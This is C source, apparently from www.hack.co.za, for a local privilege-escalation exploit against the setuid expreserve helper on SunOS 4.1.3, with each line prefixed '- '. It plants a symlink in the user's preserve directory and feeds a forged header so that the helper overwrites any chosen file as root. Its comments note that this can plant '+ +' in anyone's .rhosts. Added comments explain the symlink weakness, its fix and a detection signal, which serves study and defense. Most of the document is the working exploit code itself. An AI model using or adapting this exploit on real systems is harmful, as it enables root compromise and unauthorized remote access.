- *
- * Exploit a security hole in expreserve on sun4.1.3
- * <program> filename
- * overwrites filename as root with garbage, chown's to you
- * (note, a 4.1.1 test overwrote with no chown
- * the first 4 characters written are "+ +\n"
- * which can be used to overwrite anyones .rhosts as root)
- *
- * Tim N.
- */
-
- #include <pwd.h>
- #include <fcntl.h>
-
- /* Sizes of the header layout below.  HBLKS is also the value main() stores
-  * in Blocks[0] (Blocks[1] gets HBLKS+1); FNSIZE bounds the name field and
-  * BLKS the block table. */
- #define HBLKS 2
- #define FNSIZE 128
- #define BLKS 900
-
- /*
-  * Header that /usr/lib/expreserve is handed at the start of its input.
-  * The layout presumably mirrors the editor's own preserve-file header on
-  * this platform (not verifiable from this file).  main() sets time, uid,
-  * flines, name and Blocks[0..1] only; the struct is an uninitialized
-  * automatic variable there, so every other byte is written out as
-  * whatever happened to be on the stack.
-  */
- typedef struct {
- time_t time; /* first bytes of the record; main() overwrites them with strcpy() */
- int uid; /* filled from getuid() */
- int flines; /* set to 0 */
- char name[FNSIZE]; /* NUL-terminated, "NoName" here */
- short Blocks[BLKS]; /* only [0] and [1] are assigned */
- short encrypted; /* never assigned */
- } header;
-
-
- /*
-  * Entry point.  Sets up a symlink and a header file, then execs
-  * /usr/lib/expreserve, the privileged helper that recovers preserved editor
-  * buffers from /var/preserve/<user>/.  The weakness it relies on (described
-  * in the header comment above) is the classic one for setuid helpers that
-  * work inside a user-writable spool directory: the helper follows a symlink
-  * the caller planted under its own preserve directory and writes through it
-  * with the helper's privileges.  The fix belongs on the helper side --
-  * refuse symlinks (lstat()/O_NOFOLLOW), do not trust caller-chosen file
-  * names in the spool, and write with the caller's credentials -- and on a
-  * host still running such a helper, symlinks inside the preserve tree that
-  * point outside it are a clear detection signal.
-  *
-  * argv[1]: path of the file that ends up written through the symlink.
-  * Exits 1 on bad usage, 2 if the temp file cannot be created; otherwise the
-  * process is replaced by execl().  K&R style, implicit int return, and the
-  * function falls off the end only if the exec fails.
-  */
- main(argc,argv)
- int argc;
- char **argv;
- {
- int p,u; /* u is declared but never used */
- header H; /* not zeroed: unassigned fields are written out as-is */
- struct passwd *pw;
- char buf[100],*dest;
-
- if(argc!=2) {
- printf("usage: %s destination\n",argv[0]);
- exit(1);
- }
- dest = argv[1];
- p = getpid();
- pw = getpwuid(getuid());
- /* Plant a symlink to dest in the caller's own preserve directory, named
-  * like a preserved buffer file ("Exaaa" + pid).  sprintf() is unbounded
-  * and the symlink() result is ignored. */
- sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p);
- symlink(dest,buf);
- /* Free descriptor 0 so the next open() receives it: everything below
-  * writes to fd 0, which presumably is where the helper reads its input. */
- close(0);
- if(open("./Ex",O_RDWR|O_CREAT,0666)<0) {
- printf("Cant open Ex (temp file)\n");
- exit(2);
- }
- /* fill out header so that expre thinks its legit */
- H.time = 12345; /* who cares */
- /* Overwrites the leading bytes of the record (the time field) with "+ +\n"
-  * and its NUL -- the "first 4 characters" mentioned in the header comment.
-  * strcpy() is called without a prototype (no <string.h>) and with a
-  * time_t * argument. */
- strcpy(&H.time,"+ +\n"); /* its a long, we got some free bytes in there*/
- strcpy(H.name,"NoName");
- H.flines = 0;
- H.uid = getuid();
- H.Blocks[0] = HBLKS;
- H.Blocks[1] = HBLKS+1;
- write(0,&H,sizeof(H)); /* whole struct, including the uninitialized bytes */
- lseek(0,0,0); /* rewind fd 0 so the helper reads from offset 0 */
- printf("Made temp file 'Ex'. You can remove it when done.\n");
- /* Replaces this process image; the trailing 0 is the argv terminator. */
- execl("/usr/lib/expreserve","expreserve",0);
- printf("Couldnt exec!\n"); /* reached only if execl() fails */
- }
- /* www.hack.co.za [2000]*/